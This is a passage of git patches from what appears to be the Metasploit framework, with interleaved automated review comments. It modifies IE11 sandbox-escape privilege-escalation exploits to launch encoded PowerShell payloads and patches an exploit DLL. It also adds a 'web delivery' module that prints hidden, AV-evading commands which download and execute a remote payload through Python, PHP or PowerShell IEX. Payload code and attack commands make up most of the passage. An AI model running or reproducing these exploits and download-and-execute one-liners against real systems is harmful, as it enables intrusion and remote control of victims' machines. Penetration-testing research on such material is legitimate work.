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 Nxm<QlCp<{`|1W*%@xK57 
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp index 52d366faf8..162568212e 100755 --- a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp @@ -112,8 +112,8 @@ void DoRegistrySymlink() throw 0; } - CreateRegistryValueString(hKey, L"AppName", L"mshta.exe"); - CreateRegistryValueString(hKey, L"AppPath", GetWindowsSystemDirectory()); + CreateRegistryValueString(hKey, L"AppName", L"powershell.exe"); + CreateRegistryValueString(hKey, L"AppPath", GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0"); CreateRegistryValueDword(hKey, L"Policy", 3); bstr_t name = GetSessionPath() + L"\\BaseNamedObjects\\LRIEElevationPolicy_"; @@ -156,7 +156,7 @@ void DoRegistrySymlink() CloseHandle(hSection); hSection = nullptr; - MyCreateProcess(GetWindowsSystemDirectory() + L"\\mshta.exe", L"mshta.exe " + GetExploitUrl(L"HTA_URL")); + MyCreateProcess(GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0\\powershell.exe", L"powershell.exe " + GetExploitUrl(L"PSH_CMD")); } catch (...) { diff --git a/external/source/exploits/IE11SandboxEscapes/make.msbuild b/external/source/exploits/IE11SandboxEscapes/make.msbuild deleted file mode 100755 index e2ca621d10..0000000000 --- a/external/source/exploits/IE11SandboxEscapes/make.msbuild +++ /dev/null 
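Review bot: The PowerShell directory literal `L"\\WindowsPowerShell\\v1.0"` is now written out twice in DoRegistrySymlink: once for the `AppPath` value in the hunk at -112 and again inside the `MyCreateProcess` path in the hunk at -156. The two can drift apart on a later edit. Build it once, for example `const auto pshDir = GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0";`, and use `pshDir` in both places. In the second hunk `GetExploitUrl(L"PSH_CMD")` now fetches a command line rather than a URL, so a comment such as `// PSH_CMD holds PowerShell arguments, not a URL` would stop the helper's name from misleading readers. The function body starts and ends outside both hunks.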
@@ -1,18 +0,0 @@ -<?xml version="1.0" standalone="yes"?> -<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> - <PropertyGroup> - <SolutionPath>.\IE11SandboxEscapes.sln</SolutionPath> - </PropertyGroup> - - <Target Name="all" DependsOnTargets="x86" /> - - <Target Name="x86"> - <Message Text="Building IE11SandboxEscapes x86 Release version" /> - <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/> - </Target> - - <Target Name="x64"> - <Message Text="IE11SandboxEscapes not supported in x64" /> - </Target> -</Project> - diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb index 457a90bb90..1cf3a6204c 100644 --- a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb +++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb @@ -74,13 +74,13 @@ class Metasploit3 < Msf::Exploit::Local rescue Timeout::Error end - session.railgun.kernel32.SetEnvironmentVariableA("HTA_URL", nil) + session.railgun.kernel32.SetEnvironmentVariableA("PSH_CMD", nil) session.railgun.kernel32.SetEnvironmentVariableA("HTML_URL", nil) end def primer - hta_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.hta" - session.railgun.kernel32.SetEnvironmentVariableA("HTA_URL", hta_uri) + cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip + session.railgun.kernel32.SetEnvironmentVariableA("PSH_CMD", cmd) html_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.html" session.railgun.kernel32.SetEnvironmentVariableA("HTML_URL", html_uri) 
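Review bot: The `gsub('%COMSPEC% /B /C start powershell.exe ','')` in `primer` depends on the exact wrapper text that `cmd_psh_payload` emits, and nothing here says why the prefix is stripped. If that helper's output ever changes, the substitution becomes a silent no-op and `PSH_CMD` carries the wrapper as well. A comment such as `# the native side starts powershell.exe itself, so pass only its arguments` would record the intent. Checking that the prefix was actually present, and stopping otherwise, would surface a mismatch. The same expression is repeated in ms14_009_ie_dfsvc.rb later in this series, so a shared helper would keep the two in step.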
@@ -99,17 +99,7 @@ class Metasploit3 < Msf::Exploit::Local end def on_request_uri(cli, request) - if request.uri =~ /\.hta$/ - print_status("Sending hta...") - hta = <<-eos -<script> -var command = "#{cmd_psh_payload(payload.encoded).strip}"; -var shell = new ActiveXObject("WScript.Shell"); -shell.Run(command); -</script> - eos - send_response(cli, hta, {'Content-Type'=>'application/hta'}) - elsif request.uri =~ /\.html$/ + if request.uri =~ /\.html$/ print_status("Sending window close html...") close_html = <<-eos <html> From 98a06b3d72cae72ca6ce51be5d27451829860f7b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 3 Jun 2014 09:05:26 -0500 Subject: [PATCH 464/853] Restore make.msbuild --- .../exploits/IE11SandboxEscapes/make.msbuild | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 external/source/exploits/IE11SandboxEscapes/make.msbuild diff --git a/external/source/exploits/IE11SandboxEscapes/make.msbuild b/external/source/exploits/IE11SandboxEscapes/make.msbuild new file mode 100644 index 0000000000..e2ca621d10 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/make.msbuild @@ -0,0 +1,18 @@ +<?xml version="1.0" standalone="yes"?> +<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <PropertyGroup> + <SolutionPath>.\IE11SandboxEscapes.sln</SolutionPath> + </PropertyGroup> + + <Target Name="all" DependsOnTargets="x86" /> + + <Target Name="x86"> + <Message Text="Building IE11SandboxEscapes x86 Release version" /> + <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/> + </Target> + + <Target Name="x64"> + <Message Text="IE11SandboxEscapes not supported in x64" /> + </Target> +</Project> + From 372a12b966183464485095d0cc5732b0cd8524d9 Mon Sep 17 00:00:00 2001 
From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 3 Jun 2014 09:07:34 -0500 Subject: [PATCH 465/853] Restore make.msbuild permissions --- external/source/exploits/IE11SandboxEscapes/make.msbuild | 0 1 file changed, 0 insertions(+), 0 deletions(-) mode change 100644 => 100755 external/source/exploits/IE11SandboxEscapes/make.msbuild diff --git a/external/source/exploits/IE11SandboxEscapes/make.msbuild b/external/source/exploits/IE11SandboxEscapes/make.msbuild old mode 100644 new mode 100755 From 95376bf6d3384cfdbc71a732434f7b39d5988484 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Tue, 3 Jun 2014 10:17:27 -0400 Subject: [PATCH 466/853] Pymeterpreter update stager and stage descriptions --- modules/payloads/stagers/python/bind_tcp.rb | 2 +- modules/payloads/stagers/python/reverse_tcp.rb | 2 +- modules/payloads/stages/python/meterpreter.rb | 7 +++++-- 3 files changed, 7 insertions(+), 4 deletions(-) diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb index 6886bce4f1..277afc3050 100644 --- a/modules/payloads/stagers/python/bind_tcp.rb +++ b/modules/payloads/stagers/python/bind_tcp.rb @@ -15,7 +15,7 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Python Bind TCP Stager', - 'Description' => 'Python connect stager', + 'Description' => 'Listen for a connection', 'Author' => 'Spencer McIntyre', 'License' => MSF_LICENSE, 'Platform' => 'python', diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb index 2921f9011f..2608320d31 100644 --- a/modules/payloads/stagers/python/reverse_tcp.rb +++ b/modules/payloads/stagers/python/reverse_tcp.rb 
@@ -15,7 +15,7 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Python Reverse TCP Stager', - 'Description' => 'Reverse Python connect back stager', + 'Description' => 'Connect back to the attacker', 'Author' => 'Spencer McIntyre', 'License' => MSF_LICENSE, 'Platform' => 'python', diff --git a/modules/payloads/stages/python/meterpreter.rb b/modules/payloads/stages/python/meterpreter.rb index 1862298b82..0f0118ae68 100644 --- a/modules/payloads/stages/python/meterpreter.rb +++ b/modules/payloads/stages/python/meterpreter.rb @@ -14,8 +14,11 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Python Meterpreter', - 'Description' => 'Run a meterpreter server in Python', - 'Author' => ['Spencer McIntyre'], + 'Description' => %q{ + Run a meterpreter server in Python. Supported Python versions + are 2.5 - 2.7 and 3.1 - 3.4. + }, + 'Author' => 'Spencer McIntyre', 'Platform' => 'python', 'Arch' => ARCH_PYTHON, 'License' => MSF_LICENSE, From 05ed2340dc18b39e448d1225738eb77dc460a966 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 3 Jun 2014 09:29:04 -0500 Subject: [PATCH 467/853] Use powershell --- data/exploits/CVE-2014-0257/CVE-2014-0257.dll | Bin 108544 -> 108544 bytes .../windows/local/ms14_009_ie_dfsvc.rb | 59 ++++++------------ 2 files changed, 19 insertions(+), 40 deletions(-) 
diff --git a/data/exploits/CVE-2014-0257/CVE-2014-0257.dll b/data/exploits/CVE-2014-0257/CVE-2014-0257.dll index cdfd0626b75c0d6fff30a5b9625536d432cbf51a..00a4f22ff675408e69861c6a5f7ca379a9016506 100755 GIT binary patch delta 466 zcmZp;z}9eqZNdlU^*4Gae%{O2uz4dRGc)6l$y-^b14&=j<v{W)YdzzO$)#-58E;JH zWj_WauduHIiq~^A0ohEPAwV*m(~9xN=1H6?OyV7ti~|2fBNQ10dR<Q(cm2Zv1OXW@ zHlOAG$H@3%^BLZHkOe-1-<en{H@gaLV`LQB{6|=jiSfr~KCynr$-H95n=gnTVieZ^ z8kD6F^kSX>14B1k^AUmgxWnNY0h3osDls-pJ|k%ZbS|e92df}Y6{Eo6GjOm&WU`X{ zJVuMn2jztrMJ<4mFD|h$Fl2yPCqS%#%`X&MnHU2m=PBzmCQP2ET*Ig^Sz2WoW69)0 zD%y+*o8PI}G6L<;Q40dvQLh&IR2~>W!62V70WpYiqKc8>L<%EFhyf_K{WCYCq%32> zc3w?JZdM>IsmCa+&BRf)T`!W+juFJji()L|5G`QHXDDY#Whi1OX2<~2IY7uT{bdqk zKMTmH?G?$4E{uwK1q>lUdVLPlV-q{~)<pG#>~Xe=3CJ%`Eh^4P&B>YmCWX;>yFw~s Vo;`bwWrO7&s{`AoE@8}O1_0UGowEP{ delta 464 zcmZp;z}9eqZNdlUpS>LuKksEM*u0UEnVIp$<gF~zfut|%av=GYwVv_D<Wjcjj3*}Z zvL6GISJ+np#p^kmfNUnt5Fi=OX~lSA^CV6cCh>|&MuGpL5sHigy{;#YyZ&JSf`E)0 zo6mCpV`RLs`3!G8Gvk}dK7!wwepGCB723wg$g%m4upraqx#Gr~9mHZmisp%bVHB4E z8kD6F^kSX>14B1k^AUmgxWnNYE|XVEDlwK!J|k(vShAT@ii1_~4^ZLZGjOnjWwMg| zJVuSp2jztrMK!7z1zucYV_?Vtvrd3m4x3*nv@$U|OwLo*XAGD;Pq~IsV6wEzGRBn2 zhg7r~12(@?v1J6>p`#WAw4+`v^r<{BfPz6jVFKbLAl^~M$gm@Y5hTO_l-vH9n^97h zF=0EeCL=d1ke1YA6xL??QMp|&lF^P4#K?<cEaKqIWhiFIU?^cooc=Y5v449<GNTKl z!O5A?sZV;uoi{93pOL1}4>X#A!PzRt)78*0I596JDZj$CI61K(wOBVdvA86)X!_d} bM&s@Bsf_vd>;;x3mTRmwY@fP>F`F3x3h$$( diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index 55d028cd29..84a0ea81a3 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -13,7 +13,6 @@ class Metasploit3 < Msf::Exploit::Local include Msf::Exploit::Powershell include Msf::Exploit::EXE - include Msf::Exploit::Remote::HttpServer include Msf::Post::Windows::Priv include Msf::Post::Windows::FileInfo include Msf::Post::File 
@@ -47,12 +46,15 @@ class Metasploit3 < Msf::Exploit::Local ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], - 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'IE 8 - 11', { } ] ], 'DefaultTarget' => 0, + 'DefaultOptions' => + { + 'WfsDelay' => 30 + }, 'DisclosureDate'=> "Feb 11 2014", 'References' => [ @@ -153,12 +155,22 @@ class Metasploit3 < Msf::Exploit::Local print_good(".NET looks vulnerable, exploiting...") - begin - Timeout.timeout(datastore['DELAY']) { super } - rescue Timeout::Error - end + cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip + session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd) - session.railgun.kernel32.SetEnvironmentVariableA("MYURL", nil) + temp = get_env('TEMP') + + print_status("Loading Exploit Library...") + + session.core.load_library( + 'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"), + 'TargetFilePath' => temp + "\\CVE-2014-0257.dll", + 'UploadLibrary' => true, + 'Extension' => false, + 'SaveToDisk' => false + ) + + session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", nil) end def valid_mscorlib_version?(net_version, mscorlib_version) 
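Review bot: `temp + "\\CVE-2014-0257.dll"` in the hunk at -153 raises NoMethodError if `get_env('TEMP')` returns nil, which would presumably happen when the variable is not set in the session's environment. Guard it before the `load_library` call, e.g. `fail_with(Failure::Unknown, 'TEMP is not set') if temp.nil?`. The enclosing method starts outside the hunk.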
@@ -183,38 +195,5 @@ class Metasploit3 < Msf::Exploit::Local valid end - def primer - exploit_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.hta" - session.railgun.kernel32.SetEnvironmentVariableA("MYURL", exploit_uri) - - temp = get_env('TEMP') - - print_status("Loading Exploit Library...") - - session.core.load_library( - 'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"), - 'TargetFilePath' => temp + "\\CVE-2014-0257.dll", - 'UploadLibrary' => true, - 'Extension' => false, - 'SaveToDisk' => false - ) - end - - def on_request_uri(cli, request) - if request.uri =~ /\.hta$/ - print_status("Sending hta...") - hta = <<-eos -<script> -var command = "#{cmd_psh_payload(payload.encoded).strip}"; -var shell = new ActiveXObject("WScript.Shell"); -shell.Run(command); -</script> - eos - send_response(cli, hta, {'Content-Type'=>'application/hta'}) - else - send_not_found(cli) - end - end - end From b8a2cf776bba370cd14a58e4ea4713a10ef03598 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 3 Jun 2014 09:48:40 -0500 Subject: [PATCH 468/853] Do test --- data/exploits/CVE-2014-0257/CVE-2014-0257.dll | Bin 108544 -> 108544 bytes .../windows/local/ms14_009_ie_dfsvc.rb | 6 +----- 2 files changed, 1 insertion(+), 5 deletions(-) 
diff --git a/data/exploits/CVE-2014-0257/CVE-2014-0257.dll b/data/exploits/CVE-2014-0257/CVE-2014-0257.dll index 00a4f22ff675408e69861c6a5f7ca379a9016506..880dab912727a4a55be841ee2cf433338466f02d 100755 GIT binary patch delta 178 zcmZp;z}9eqZNdkpZ}&ES3KV4I*z6*-osm&u^B>`9tl~PAi~?B-K`-VBFfeqpH6Ia( zk2@Tm5i)tDq!MGx<TH{sj4hivrIdJp938bFAg5j}^r_spd%eL7K)?jVAjXL*Murn9 zj36O~Z}+x;;$~zE=M4Z#c`!IL_%gUKFidAmW^CTxk<94AC=j{#`47wQvppy5F3f5C YG__&-ofO7R_RI~IE!!t9Va#U+07slX4*&oF delta 179 zcmZp;z}9eqZNdkp^*1(t3KV2y+3X^;osm&w^B>`9tl}D#i~?B-K`-VBFfeqpH6Ia( zk2@Tm5iohBq!MGp<TH{sj18MPrIdJp938bFAg5j}^r_tX8@<5{K)?jVAjXL*Murn9 zj36O~^*6SE;$~zE=k#TWWC&#lV(^*Hn#|bD0+QR_k<94AD3Djc5E7)<=P*4sv2$-t XRR8unDU6%!nQJT?wohEbn9mFVrwTZw diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index 84a0ea81a3..88f1f19176 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -64,11 +64,6 @@ class Metasploit3 < Msf::Exploit::Local ['URL', 'https://github.com/tyranid/IE11SandboxEscapes'] ] )) - - register_options( - [ - OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]) - ]) end def check @@ -156,6 +151,7 @@ class Metasploit3 < Msf::Exploit::Local print_good(".NET looks vulnerable, exploiting...") cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip + print_status cmd session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd) temp = get_env('TEMP') From 43699b1dfb363e60a312dd7b3c2edfadbc0ffe99 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 3 Jun 2014 09:56:19 -0500 Subject: [PATCH 469/853] Don't clean env variable before using it --- modules/exploits/windows/local/ms14_009_ie_dfsvc.rb | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) 
diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index 88f1f19176..3c643ef678 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -151,7 +151,6 @@ class Metasploit3 < Msf::Exploit::Local print_good(".NET looks vulnerable, exploiting...") cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip - print_status cmd session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd) temp = get_env('TEMP') @@ -165,8 +164,6 @@ class Metasploit3 < Msf::Exploit::Local 'Extension' => false, 'SaveToDisk' => false ) - - session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", nil) end def valid_mscorlib_version?(net_version, mscorlib_version) @@ -191,5 +188,10 @@ class Metasploit3 < Msf::Exploit::Local valid end + def cleanup + session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", nil) + super + end + end From 443f9f175c0c4965d12197780e99f447ba53631e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 3 Jun 2014 09:58:07 -0500 Subject: [PATCH 470/853] Update IE11Sandbox exploit source --- .../IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp index 69dc7c57bb..8166284000 100755 --- a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp @@ -165,8 +165,8 @@ void DoDfsvcExploit() { std::vector<variant_t> startArgs; - startArgs.push_back(L"mshta"); - startArgs.push_back(GetEnv(L"MYURL")); + startArgs.push_back(L"powershell"); + startArgs.push_back(GetEnv(L"PSHCMD")); ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs); } 
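Review bot: In the new `cleanup` method (hunk at -191) the `session.railgun` call runs before `super`, so if it raises, the parent class's cleanup never runs. That could happen if the session has already gone away, which this hunk cannot rule out. Put `super` under an `ensure` clause so it always executes. `cleanup` also runs when the module stops before `PSHCMD` was ever set, so a short comment saying the reset is safe to call unconditionally would help the next reader.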
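Review bot: The environment variable read here is named `PSHCMD`, while the sibling CVE-2013-5045 source and module changed earlier in this series use `PSH_CMD` for the same purpose. Pick one spelling for both so the Ruby modules and the native code cannot be mismatched by a copy-paste. The result of `GetEnv(L"PSHCMD")` is pushed into `startArgs` without a check. What GetEnv returns for an unset variable is not visible in this hunk, so confirm that case is handled before `ExecuteMethod` is called. The enclosing function continues outside the hunk.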
From 166748a997f6795bc68efac9bf7e77d76b49ebbd Mon Sep 17 00:00:00 2001 From: jakxx <jakx.ppr@gmail.com> Date: Tue, 3 Jun 2014 11:53:32 -0400 Subject: [PATCH 471/853] Add script_web_delivery --- modules/exploits/multi/script/web_delivery.rb | 93 +++++++++++++++++++ 1 file changed, 93 insertions(+) create mode 100644 modules/exploits/multi/script/web_delivery.rb diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb new file mode 100644 index 0000000000..f1066edd62 --- /dev/null +++ b/modules/exploits/multi/script/web_delivery.rb 
@@ -0,0 +1,93 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Script Web Delivery', + 'Description' => %q{ + This module quickly fires up a web server that serves a payload. + The provided command will start the specified scripting langauge interpreter and then download and execute the + payload. The main purpose of this module is to quickly establish a session on a target + machine when the attacker has to manually type in the command himself, e.g. Command Injection, + RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not + write to disk so is less likely to trigger AV solutions and will allow privilege + escalations supplied by Meterpreter. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Andrew Smith "jakx" <jakx.ppr@gmail.com>', + 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' + ], + 'DefaultOptions' => + { + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'References' => + [ + [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'] + ], + 'Platform' => %w{ py php win linux}, + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'N/A' + )) + register_options( + [ + OptString.new('SCRIPT_LANG', [true, 'Scripting Language to use: PY, PHP, or PSH,', 'PY']), + ], self.class) + end + + def on_request_uri(cli, request) + print_status("Delivering Payload") + if (datastore['SCRIPT_LANG'] == "PSH") + data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) + else + data = %Q|#{payload.encoded} | + end + send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) + end + + def primer + url = get_uri() + p = datastore['Payload'] + if 
(datastore['SCRIPT_LANG'] == "PHP") + if (p[0..2] == "php") + print_status("Run the following command on the target machine:") + print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"") + print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"") + else + print_error("Payload currently unsupported by PHP. You will need to use a native PHP payload, such as php/meterpreter") + return + end + elsif (datastore['SCRIPT_LANG'] == "PY") + if (p[0..5] == "python") + print_status("Run the following command on the target machine:") + print_line("For Linux: python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") + print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") + else + print_error("Payload currently unsupported by Python. You will need to use a native python payload, such as python/meterpreter") + return + end + elsif (datastore['SCRIPT_LANG'] == "PSH") + download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" + print_status("Run the following command on the target machine:") + print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"") + else + print_error("You did not specify a valid scripting language. Exiting...") + return + end + end + end \ No newline at end of file From 0e4177fb7502848eed957db0a25516635c4022d3 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Tue, 3 Jun 2014 12:03:20 -0400 Subject: [PATCH 472/853] Pymeterpreter shorten stagers by 3 bytes --- modules/payloads/stagers/python/bind_tcp.rb | 4 ++-- modules/payloads/stagers/python/reverse_tcp.rb | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb index 277afc3050..60753157c1 100644 --- a/modules/payloads/stagers/python/bind_tcp.rb +++ b/modules/payloads/stagers/python/bind_tcp.rb 
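Review bot: `SCRIPT_LANG` is registered as a free-form `OptString` and only validated inside `primer`; an unrecognised value prints an error and returns, while `on_request_uri` has no such check. Presumably the HTTP server is already running by the time `primer` is called. Declaring it as `OptEnum.new('SCRIPT_LANG', [true, 'Scripting language to use', 'PY', ['PY', 'PHP', 'PSH']])` rejects bad values at option validation and makes the final `else` branch unnecessary. Smaller items in the same file: `'DisclosureDate' => 'N/A'` is not a date, the description misspells "language" as "langauge", and the header URL `http//metasploit.com/download` lacks its colon. The file also ends without a newline.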
